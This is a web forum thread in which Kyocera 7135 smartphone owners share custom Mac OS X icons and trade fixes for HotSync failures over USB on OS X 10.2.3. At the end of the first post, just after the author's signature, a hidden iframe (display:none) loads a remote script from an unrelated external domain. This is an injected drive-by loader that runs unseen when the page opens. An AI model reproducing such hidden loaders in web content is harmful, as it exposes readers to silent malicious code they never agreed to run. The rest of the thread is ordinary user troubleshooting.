+ Reply to Thread
Page 1 of 2 1 2 LastLast

Kyocera 7135 Icons for Mac OS X

Hello everyone-

Thought you would all be happy to find out, that even though you may not be able to GET a 7135, ou can get the next best thing...

Mac OS X icons OF the 7135

They are located here....

http://home.earthlink.net/~dieselboy/7135.html

There are 10 or so custom, 128x128 scalable icons. To use these icons, download the file, unstuff it. Then get info on one of my icons and then on whatever file or folder you want to use my icons on. Cut and paste after clicking on the icon in the Show Info window...

Email me with any questions, spread the word, and forward the link.

Cheers,
    Alex<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Thanks! These icons ROCK!

I'm puttin'em on my iBook right now!
    Sorry, but I no longer make 7135 headset adapters.

Really nice job, these will look great on my Dual G4!

Thanks, Alex! Very spiffy on my "chiclet" iBook!

Since OS X types will be visiting here, it's as good a place to ask as any: Is anyone else finding their 7135 reluctant to sync? I'm running OS 10.2.3, and restarting the computer seems to "fix" it (i.e., give me a couple more syncs), but is a pain. I've talked to Kyocera, and they (of course) had me take everything off the 7135, hard reset, reinstall the desktop s/w, etc. All of which worked, again, for about two syncs.

Laurie

I have had no problems syncing after I selected the USB cradle and not "standard" cradle that was the default. I insert thephone into the cradle and then sync by hitting th hotsync icon on the phone screen. Once I started doing it this way, it has worked everytime.

But here is a question, How do you load ohotos into the 7135 running MacOSX? Is photoSuite just windows?

Mike

HotSync Issues

I, too, cannot get my 7135 to sync more than one or two times unless I restart the computer or do a hard reset on my phone.

Mike, when you say you select the USB cradle, do you mean you create a new connection then select it in HotSync. I tried that but it always switches back to Cradle/Cable.

As for PhotoSuite, it is Windows only. I have a PC that I use to convert the pictures, then transfer them to my iMac and install them. If you don't have a PC, you could try VPC, but I don't know if it would work. Otherwise, the shareware SplashPhoto would do a similar job.

Gilbert

Here is my set-up...Prefs PDA menu...Connection...Custom...Edit the custom to: Connect to: PC.....Via: USB Hotsync

Try that and see if it makes a difference. Also thanks for the tip on SplashPhoto.

Mike

For kicks, I connected my Palm Serial to USB connector that I used to use with my now retired Samsung i300. Now, every HotSync is working as it should. The only problem is that it is slow as molasses. When I can get the USB HotSync to work it takes about 7-8 minutes to download all my programs and documents (~8MB) to my 7135. Over the serial to USB connection, it takes about 30 minutes.

I'll try your suggestion again and see if I have any better luck.

Gilbert

here's a small collection of Smartphone Icons 128 X 128, I made for Mac OS X.

download here

Sweet!
    "Why all the pearls, why the blue hair, why anything!?"

Originally posted by MRitter
    Here is my set-up...Prefs PDA menu...Connection...Custom...Edit the custom to: Connect to: PC.....Via: USB Hotsync

Try that and see if it makes a difference. Also thanks for the tip on SplashPhoto.

Mike
    Thanks for the suggestion, Mike. I've been trying, but I can't get it to work that way. As Gilbert mentioned, it tends to want to switch back to Cradle/Cable. When it stays in Custom mode, Conduit Manager doesn't open on my desktop.

The quest continues . . . :dunno

Laurie

I tried Mike's suggestion again, but still no luck. I sent an email to Kyocera's tech support and I received an email to call them back, but I got home after they closed.

I tried the Palm Serial to USB connector again and it works every time albeit slowly. I'll have to stick with it for the time being. I wonder if the problem is similar to what HP had with their USB printers. The printer would lose communication with the printer within 10-15 minutes after a reboot if it wasn't used. The only way to re-establish the connectivity was to logout or reboot. I mentioned this in my email to Kyocera. HP has since come out with drivers that fixed the problem. I hope Kyocera can do the same.

I'll post any info I get after talking to Kyocera.

Gilbert

Are you guys running 10.2 or higher? Are you using the hotsync button on the screen of the phone and not the one on the cradle?

Mike

I am running 10.2.3 and I have tried both the button on the cradle and the one on the screen via the HotSync utility.

Gilbert

Originally posted by gilbreen
    I am running 10.2.3 and I have tried both the button on the cradle and the one on the screen via the HotSync utility.

Gilbert
    ditto!

I will appreciate hearing what Kyocera has to say--TIA for passing it along.

I've been having trouble syncing too. What I've found is that the first time I try to sync after putting the phone in the cradle it doesn't work. I just wait for the sync to time out, hit cancel, take the phone out of the cradle, put it back in and hit the button again, then it works. If I hit the sync button again without taking the phone out of the cradle and replacing it I have to do a soft reset because the phone locks up.

So far, this has been working for me, though it is a little tedious.
    Sorry, but I no longer make 7135 headset adapters.

Hi guys, I am a Apple Consultants Network member and I also own a consulting company that specializes in the Mac industry especially it's integration into the Windows, Unix, Novel environments. I have noticed that the problems that you guys are talking about seem to be more in line of the OS than the phone itself. I also have a 7135 and I have had NO problems in the default configuration to connect and sync to my desktop. I am using Apple's iSync app. to do the sync but it shouldn't be any different using Palm w/Entourage conduit or any other program since the conduits are basically the same. I am using OS X 10.2.3 through a USB connection. When I sync I press the sync button on the cradle and the phone automatically starts the process. One note, the phone cannot be in the HotSync menu when I try to sync. It doesn't seem to work every time.

in regards to the OS, I would try and use the OS in a trimmed out mode booting with all third party services deactivated outside of the palm and see if that works. Also I have noticed when upgrading OS 10.1.x to OS 10.2.x the OS tends to be a little problematic and sometimes very lethargic! I always recommend customers to pull data off and install OS 10.2.x with OS 9.2.2 from scratch. that seems to eliminate a lot of the FUNKY OS issues that sometimes hang around.

Thanks, coolcat and babacksh. I think I must've tried the take it out/put it back thing among all the variations I've tried (with the chicken bones pointing north, painting the USB cord with iguana blood, you know the drill . . . :devillook ) but I will try that first. Hope it doesn't come to reinstalling the OS--what a pain!

Laurie

I got home and decided to try one more time. I first tried with my Serial to USB connector and the hotsync worked as it should. I then disconnected the serial adapter and tried the built in USB. No go.

I then logged out, did a soft reset, disconnected the serial connector, plugged in the Kyocera USB and logged back in. I then disabled the PalmConnect option in the Connection settings and only left the USB checked. On the phone, I added the Custom USB connection as previously mentioned. I put the phone in the cradle, crossed my fingers and hit the hotsync button on the cradle and it worked!

I have tried several (~10) more times and each has worked. The USB is so much faster than the serial.

For kicks and giggles, I called Kyocera tonight anyway to see if they had any more suggestions. There tech support person I spoke with was about as helpful as a wet match when trying to start a fire. He said it was probably one of the programs that I was running on the handheld that was causing the problem. He told me to do the standard stuff (soft reset, hard reset, reinstall the Palm software, resinstall the OS). When I asked about making a custom setting using USB as another forum poster suggested he said not to do it and leave the setting as Cradle/Cable. Other than that he had no other suggestions.

So final setup is:

Connection Setting in Palm Preference - Custom USB
    HotSync on Phone - Both Cradle/Cable and Custom USB appear to work
    Connection Setting on computer - USB only checked

Sorry for the long post, but I hope it helps. Good luck to all.

Originally posted by gilbreen
    I tried Mike's suggestion again, but still no luck. I sent an email to Kyocera's tech support and I received an email to call them back, but I got home after they closed.

I tried the Palm Serial to USB connector again and it works every time albeit slowly. I'll have to stick with it for the time being. I wonder if the problem is similar to what HP had with their USB printers. The printer would lose communication with the printer within 10-15 minutes after a reboot if it wasn't used. The only way to re-establish the connectivity was to logout or reboot. I mentioned this in my email to Kyocera. HP has since come out with drivers that fixed the problem. I hope Kyocera can do the same.

I'll post any info I get after talking to Kyocera.

Gilbert
    I don't want to intrude on a Mac thread, but I have PC and I have the same problem with ALL of my USB stuff! My printer & my usb mouse both konk out after a certain time unless I reboot! I have an Hp 2100, Did you figure this out? Was it just drivers? I thought I had the latest.
    iPhone therefore iAm.